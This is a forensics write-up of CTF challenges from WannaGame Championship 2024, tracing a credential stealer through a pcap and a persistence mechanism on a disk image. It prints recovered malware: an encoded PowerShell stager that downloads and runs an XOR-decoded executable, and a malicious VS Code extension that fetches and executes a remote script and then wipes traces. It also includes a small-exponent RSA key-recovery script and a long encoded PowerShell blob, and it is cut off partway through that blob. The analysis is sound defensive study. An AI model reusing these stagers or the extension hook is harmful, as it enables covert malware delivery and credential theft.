[Forensics] WannaGame Championship 2024

## Preface Here is my solution to all forensics challenges in the WannaGame Championship 2024. But first is my big thanks to the author - tr4c3datr4il for all these cool challenges. ## How I met your stealer ![image](https://hackmd.io/_uploads/S11sbOsVyl.png) Attachment is provided with only a pcap file and sslkeylog. Import the sslkeylog so that you can read most of the traffic. At first, I check Conversations and File Object to detect if there was strange ip, port or file. And pay attention to ip 154.26.136.227 also with the file miku_hd_wallpaper.png (so sus >_.) ![image](https://hackmd.io/_uploads/HkHV7OoVJx.png) ![image](https://hackmd.io/_uploads/ByMd7usEJl.png) The client send request to download miku_hd_wallpaper.png from ip 154.26.136.227 and it's not a PNG with its correct format. ![image](https://hackmd.io/_uploads/r1EQHdiNkl.png) I also found out another connect between these 2 ip that the client send some encrypted stuff to the ip 154.26.136.227 ![image](https://hackmd.io/_uploads/HJ82ruiNye.png) ![image](https://hackmd.io/_uploads/HkLTSdi4Je.png) Above is just something I observed when looking at pcap file, I guess the ip 154.26.136.227 is the culprit's ip. Back to the trail let's see carefully what the client was doing at that time and how they interacted to malicious ip. The client seem to watch something on youtube, go to freecodecamp, and spend most time on github. Most of youtube traffic is QUIC/HTTP3... with unreadable data, I take more concentration on the others. I guess the client was going around on github and downloaded some malicious repo and ran it on their machine. ![image](https://hackmd.io/_uploads/SyPk2Yo4kl.png) You can check the link of each repo and see all of them come from well-known user until `https://github.com/b4dboy20/helloworld`. It was 404 when you try to access this link and also the user b4dboy20 is a suspicious profile too. The client downloaded the repo and luckily you can get it from pcap file. ![image](https://hackmd.io/_uploads/Sym32KsNye.png) Unzip you see this is a Visual Studio Project. I opened this suspicious project on ~~my local laptop~~ by clicking the .sln file and noticed something strange on my laptop - my powershell terminal was poped up, some script was ran on this but there was a lot of errors. I tried to read the Powershell log and recover the command. ![image](https://hackmd.io/_uploads/Hyucd5iN1e.png) ```bash powershell -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAE0AaQBjAHIAbwBzAG8AZgB0AC4AUABvAHcAZQByAFMAaABlAGwAbAAuAEEAcgBjAGgAaQB2AGUAOwAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAcgBlAHMAcABvAG4AcwBlACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEANQA0AC4AMgA2AC4AMQAzADYALgAyADIANwA6ADQAMQA4ADcAOQAvAG0AaQBrAHUAXwBoAGQAXwB3AGEAbABsAHAAYQBwAGUAcgAuAHAAbgBnACIAOwAkAGIAeQB0AGUAcwA9AFsAYgB5AHQAZQBbAF0AXQAoACQAcgBlAHMAcABvAG4AcwBlAC4AQwBvAG4AdABlAG4AdAApADsAJABrAGUAeQAgAD0AIABbAGIAeQB0AGUAWwBdAF0AKAAwAHgAOQA5ACwAMAB4ADQANgAsADAAeAAxAGUALAAwAHgAMwBhACwAMAB4ADIAOAAsADAAeAAzAGEALAAwAHgAMAA4ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAYwAzACwAMAB4ADIANgAsADAAeAAxAGEALAAwAHgANgA1ACwAMAB4ADEANAAsADAAeAA1ADgALAAwAHgANABhACwAMAB4ADkAOQAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADEAYgAsADAAeAAwAGIALAAwAHgAOQBkACwAMAB4AGUAYgAsADAAeAAyADEALAAwAHgAYgA3ACwAMAB4ADgAMQAsADAAeAA2AGYALAAwAHgAZgA3ACwAMAB4ADYANgApADsAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAgACAAIAAkAGIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABiAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AKQA7AH0AOwAkAG0AcwAuAFcAcgBpAHQAZQAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAOwAkAG0AcwAuAFMAZQBlAGsAKAAwACwAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwBlAGUAawBPAHIAaQBnAGkAbgBdADoAOgBCAGUAZwBpAG4AKQA7ACQAZgAxAEEAZwAxAF8AYgBhAHMAZQAzADIAPQAiAEsANABZAFgAVwAzAFIAUQBMADUAVgBUAEcAVwBLADcATgBaAEgAVgA2AFUARABTACIAOwAkAHQAbQBwACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAkAHQAbQBwADEAIAA9ACAAJAB0AG0AcAAxACAAKwAgACIAbABtAGEAbwB4AGQALgB6AGkAcAAiADsAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAdABtAHAAMQAsACAAJABtAHMALgBUAG8AQQByAHIAYQB5ACgAKQApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAJAB0AG0AcAAxACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAdABtAHAAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgAJAB0AG0AcAAgACsAIAAiAFMAZQBjAGMAdQByAGkAdAB5AFUAcABkAGEAdABlAHIALgBlAHgAZQAiACkAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAdABtAHAAMQA7AA== ``` Decode base64 we got the commands (actually it was also logged) ![image](https://hackmd.io/_uploads/BJKIYciNJl.png) ```bash= Import-Module Microsoft.PowerShell.Archive; $ms = New-Object System.IO.MemoryStream; $response = Invoke-WebRequest -UseBasicParsing -Uri "http://154.26.136.227:41879/miku_hd_wallpaper.png"; $bytes = [byte[]]($response.Content); $key = [byte[]](0x99, 0x46, 0x1e, 0x3a, 0x28, 0x3a, 0x08, 0x88, 0x49, 0xaa, 0x3a, 0xe7, 0xc3, 0x26, 0x1a, 0x65, 0x14, 0x58, 0x4a, 0x99, 0x31, 0xe4, 0x1b, 0x0b, 0x9d, 0xeb, 0x21, 0xb7, 0x81, 0x6f, 0xf7, 0x66); for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = [byte]($bytes[$i] -bxor $key[$i % $key.Length]); }; $ms.Write($bytes, 0, $bytes.Length); $ms.Seek(0, [System.IO.SeekOrigin]::Begin); $f1Ag1_base32 = "K4YXW3RQL5VTGWK7NZHV6UDS"; $tmp = [System.IO.Path]::GetTempPath(); $tmp1 = $tmp1 + "lmaoxd.zip"; [System.IO.File]::WriteAllBytes($tmp1, $ms.ToArray()); Expand-Archive -Path $tmp1 -DestinationPath $tmp -Force; Start-Process -FilePath ($tmp + "SeccurityUpdater.exe") -NoNewWindow; Remove-Item $tmp1; ``` After the victim open the project, the malicious script was executed, request to `154.26.136.227`, download non-png file which named `miku_hd_wallpaper.png`, xor with key to obtain a `lmaoxd.zip` which contain `SeccurityUpdater.exe`, extract the zip file and run the exe file. From that we can recover the exe file as the script did. Because `SeccurityUpdater.exe` is written by C# do I use dnSpy to decompile the code. We got the first part of flag btw: **W1{n0_k3Y_nO_Pr** ![image](https://hackmd.io/_uploads/HykHoqj4yl.png) Main part of the code that steal credential data from browsers and exfil to the attacker which is `154.26.136.227` (this is the second tcp stream that I have refered before) ![Screenshot 2024-12-15 070057](https://hackmd.io/_uploads/SyX0pqo4Jl.png) Red box is about data encryption and exfiltration part - `io1289yhe189` create a 32-byte key stored in `array2` - `dnui128hd` encrypted `array2` by RSA and stored ciphertext in `array3` which was sent in the first packet - `jkjbkabjk` encrypted credential data by AES-CBC with key `array2`, iv was concatinated after the ciphertext and stored in `array4` which was sent finally. We have to decrypted `array2` to get the raw key for the credential data's decryption. Reversing we know that the RSA public key is already defined in the code in `jkabkw182asd`. ![image](https://hackmd.io/_uploads/HkpBZiiE1e.png) We got the second flag too: **0b1Em!!!!_this** ```! <RSAKeyValue><Modulus>q15sPNuEEmXnxko2yBBixhTcGCmX9LkGlhGjQ6yEIRrkNQjDybH+FL1pRN/U5SfM3yL6U92KBtOTzCk+lOeT9MfurVA9EKYpUfBCbS1Y7A0EkFlu66uLVs/QWclPluo+SJaLi8c84qDcLy9Sy4hqWpcB8QdKjZWXscvOnJEmv9NvbYeJrZM8Y9/yk+mvNRjLesTW+9KjBtQ+T8pYzFMXgNRPzQROytujeN4mM2Rejk1pCzsusJ0i4jzXl/tkgGtGtFjn0sy7Je114wOihdy+xox5blBSwG/qALcJj+Jnt2HMtaytM5nRa9gv8GlkTPH0UzsosalRQ/U2t3Dz0aXaVRwKuPFx8/UnTjT75jM3AKHB1KNiKCjNwPX8bGARly1Kszmsg3xDdUp5sCWsuRlSwxvKUVFD7Alxwsx3MinQdO91oZWEKNGdbJ/qm76gWPYKDanSKC2cRYGoT3hWEpPGS1uwnrz/tjyk8XLO+ZcbAIs0UeeykgpkZXzyKzq4u79pTnb0ma992sr/RtICBe8j5qER7K/1oGWGYMW87Pd86ZGMFv6NUNJ58rvxPHUKsD/3ydGmzrTnjKNuR5pkc2tUnTrSRM0pGiqrU84y2f7Cru+glGS2xG+sQnoz8XF+SIQ5zFR0+l/aGlbvDYKatzR6J5fvBxTD0/S03cm3wv0vKWM=</Modulus><Exponent>Cw==</Exponent></RSAKeyValue> ``` Although there is no private key to decrypt the data here, RSA public key seems kinda strange. I searched and realized the Exponent is 11 which is smaller than usual (65 537) We have the encryption formular: $c=m^e\bmod n$ $c$ is ciphertext, $m$ is plaintext, $e$ is Exponent and n is Modulus in public key. The $e$ is too small leading to the $m^e$ is smaller than $n$, then we can retrive the plaintext by: $m=\sqrt[e]{c}$ My script to try to exploit this (I modified it from https://asecuritysite.com/rsa/rsa_ctf03) ```python= from Crypto.Util.number import long_to_bytes,bytes_to_long from Crypto import Random import Crypto import sys import libnum import base64 modulus = """ q15sPNuEEmXnxko2yBBixhTcGCmX9LkGlhGjQ6yEIRrkNQjDybH+FL1pRN/U5SfM3yL6U92KBtOTzCk+lOeT9MfurVA9EKYpUfBCbS1Y7A0EkFlu66uLVs/QWclPluo+SJaLi8c84qDcLy9Sy4hqWpcB8QdKjZWXscvOnJEmv9NvbYeJrZM8Y9/yk+mvNRjLesTW+9KjBtQ+T8pYzFMXgNRPzQROytujeN4mM2Rejk1pCzsusJ0i4jzXl/tkgGtGtFjn0sy7Je114wOihdy+xox5blBSwG/qALcJj+Jnt2HMtaytM5nRa9gv8GlkTPH0UzsosalRQ/U2t3Dz0aXaVRwKuPFx8/UnTjT75jM3AKHB1KNiKCjNwPX8bGARly1Kszmsg3xDdUp5sCWsuRlSwxvKUVFD7Alxwsx3MinQdO91oZWEKNGdbJ/qm76gWPYKDanSKC2cRYGoT3hWEpPGS1uwnrz/tjyk8XLO+ZcbAIs0UeeykgpkZXzyKzq4u79pTnb0ma992sr/RtICBe8j5qER7K/1oGWGYMW87Pd86ZGMFv6NUNJ58rvxPHUKsD/3ydGmzrTnjKNuR5pkc2tUnTrSRM0pGiqrU84y2f7Cru+glGS2xG+sQnoz8XF+SIQ5zFR0+l/aGlbvDYKatzR6J5fvBxTD0/S03cm3wv0vKWM= """ N = int.from_bytes(base64.b64decode(modulus), byteorder='big') exponent = """Cw==""" e= int.from_bytes(base64.b64decode(exponent), byteorder='big') encrypted_bytes = bytes.fromhex("4188b6cde96d0eeb8ab76375000ebd7bd192e770783a384f2b783f1d2962b50bbd6eb736e811e3232e8ce4a29bd1fd4a1f714906fb70d67a0e1539173d7b831e951a3ccc17f72b6584d289af5d53b9bce68d832060e760197c599914354bbd427f4ff8d408e7d19359d436fdb04581ef5b2350d365151ed7afd72783cc33681cf406b6220a04f6a4a7f9add5b93298b1263e8802e4e0b869c245c217991bb38e411dcce33e4898ce1d6e217877fe6d3c809a5a695c2193db9661ea8bd27a2cefe41178dc9aff4878bb73602c15a113070a85b1c854b186a58fc30c9980b795c55375ab6143d4dbe404d452e0ae7a730d5312d029f72dca0cf9b30b6934678cb9a0863ca2c8438ed483acff3243cb0acd98a779166dec6d12e11a7edad26ada6d20385f5240d10de32f16eb17bb924d06f2c439a8abb71a5aaebe9e841cd50d4f29c4f1ab88d30dfaeb07ec64405d212b41b7bd73f73550cdcc1f8ac800") C = int.from_bytes(encrypted_bytes, byteorder='big') print("C = ",C) print("N = ",N) print("e = ",e) # C=pow(m,e,N) m=libnum.nroot(C,e) print(f"For e={e}, we take the {e}th root to get: {m}") print(f"\nDecipher: {long_to_bytes(m).hex()}") ``` ```python C = 765552301135508081201363481844386958557728274002203468150150920329288762132965608144622203714651596402284938989673842611659871939804431125533527734095681360608064317982885000972577726029488391757869086309925463622683019603169882844815245313147794675850905418030258817679998958221853947715445769472063839626972898896443482819157196204886401877772681149237415862037510536478058877452673996790030216112452784158277658299131219275414806137517820806192719024754521947228578801256297152512184784299855776341933561271728327849715428266115087584407546977743717994988826573304138709312212725784019556130637093132870240062372613463313176613307647305450935388916217847007842725295320585526578298299701062879291783920233230737400112163283638817142454904196820925965901427790284636124737736964381776819519685195205913170793211629553310324877019111409664 N = 699123867782377383903194864660375018283940639589695361478170961326831038977890118033149456981751177510265745296456052332937859583298708916853881060738078103573083287343979221850764755811103946379853959816839601893739744490753713309491945974759976197010159015175569567271839473728475421738836342729864450171289623114370146552615485898603531239884812330664764318968471652383059558072424443094726014141054756036266284312438252306302209120226676666161818974924519176079371141899267980020481054478901987767216107847771869112179354902303929663422699409279172632939016847257862555862277978052579204307245903063828281357032938697408839429335096277355919001250515744223237102522479456351427316496083349522812989975929614893234639194722231055477687648731694229053747446448186574823610228271847952779632032930309014394039780315566430403485217138075888009183366436677192588839077037817193620114061867710647056225703814291589688637483288888210922227249498286699664463813185635543606621535059523718559151442061667839000311051632929733359672498125446429107730030773234212509478201295514758703609590034650095097175654332974532912337318496309972967480835291653602849897244909995495160954032377318831444586417112908500463341022273081859176433395378531 e = 11 For e=11, we take the 11th root to get: 22546992699049334695421892640652572594966568026099748931620220191519365402514 Decipher: 31d92547fcf97ae5a29534e884a848780dcd86c4606ea824fe2419f1d8640f92 ``` Test with the "cracked key" `31d92547fcf97ae5a29534e884a848780dcd86c4606ea824fe2419f1d8640f92` ![image](https://hackmd.io/_uploads/r1KDuii4ke.png) Unzip and open edge_passwords.txt ![image](https://hackmd.io/_uploads/SJksdoj4kx.png) So the flag is: **W1{n0_k3Y_nO_Pr0b1Em!!!!_this_should_be_an_ez_game_UwU~~}** ## Persistence ![image](https://hackmd.io/_uploads/BkSr4Oi4kx.png) I stuck most of my time at this challenge because of my stupid thinking (quite disappointed). I spent hours digging in the registry hive as I was too obsessed with the idea of persistence in the registry (huhu inside TT_TT). While being lost in the registry, I tried to detect some suspicious executable file by checking the prefetch and guessed it could be some powershell command and the relative ok.exe ![image](https://hackmd.io/_uploads/SkhdGq2Nkg.png) ![image](https://hackmd.io/_uploads/SkZ9f53Vyg.png) I also tried to find anything about powershell or ok.exe and got nothing too (the author have much experience in hiding artifacts from the players sight, I guess). Give up on things in registry, I returned to something outside of it. I looked at extension location of browsers, app and noticed the .vscode folder too. Then I find a strange extension in .vscode with malicious extension.js file ```javascript= "use strict"; var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { if (k2 === undefined) k2 = k; var desc = Object.getOwnPropertyDescriptor(m, k); if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { desc = { enumerable: true, get: function() { return m[k]; } }; } Object.defineProperty(o, k2, desc); }) : (function(o, m, k, k2) { if (k2 === undefined) k2 = k; o[k2] = m[k]; })); var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { Object.defineProperty(o, "default", { enumerable: true, value: v }); }) : function(o, v) { o["default"] = v; }); var __importStar = (this && this.__importStar) || (function () { var ownKeys = function(o) { ownKeys = Object.getOwnPropertyNames || function (o) { var ar = []; for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k; return ar; }; return ownKeys(o); }; return function (mod) { if (mod && mod.__esModule) return mod; var result = {}; if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]); __setModuleDefault(result, mod); return result; }; })(); Object.defineProperty(exports, "__esModule", { value: true }); exports.activate = activate; exports.deactivate = deactivate; const vscode = __importStar(require("vscode")); function activate(context) { const disposable = vscode.commands.registerCommand('nvim-exprerience.Install', async () => { vscode.window.showInformationMessage('Hello World from nvim-exprerience!'); const cp = require('child_process'); const executeCommand = (cmd) => { return new Promise((resolve, reject) => { cp.exec(cmd, (err, stdout, stderr) => { if (err) { console.error(`Error: ${err.message}`); return reject(err); } if (stderr) { console.error(`Stderr: ${stderr}`); } console.log(`Stdout: ${stdout}`); resolve(stdout); }); }); }; // fl4g p@rT 1 == YmFzZTMyOiBLNFlYV1laUUdCV0Y2NVpVUEZQWElNQzdNRkpHR1NBPQ== try { await executeCommand('certutil -urlcache -f https://gist.githubusercontent.com/b4dboy20/01f222523f23c38207aaa8657d34a6bb/raw/3141c7ac280462d964ad20bf4b514348d02a111a/kashfu.ps1 ancn98218.ps1'); await executeCommand('powershell -ExecutionPolicy Bypass -File ancn98218.ps1'); await executeCommand('del ancn98218.ps1 && cipher C:'); vscode.window.showInformationMessage('Commands executed successfully!'); } catch (error) { // vscode.window.showErrorMessage(`Error executing commands: ${error}`); vscode.window.showErrorMessage('Error executing commands'); } }); context.subscriptions.push(disposable); vscode.commands.executeCommand('nvim-exprerience.Install'); } function deactivate() { } //# sourceMappingURL=extension.js.map ``` You can see the extension downloads powershell script from `https://gist.githubusercontent.com/b4dboy20/01f222523f23c38207aaa8657d34a6bb/raw/3141c7ac280462d964ad20bf4b514348d02a111a/kashfu.ps1` as ancn98218.ps1 and executes it, then delete the file and runs cipher to overwritten deleted data. We can not access this link anymore, but we can find it in the machine cache which located at `C:\Users\pknole\AppData\LocalLow\Microsoft\CryptnetUrlCache` ```bash= $gzipBuffer = "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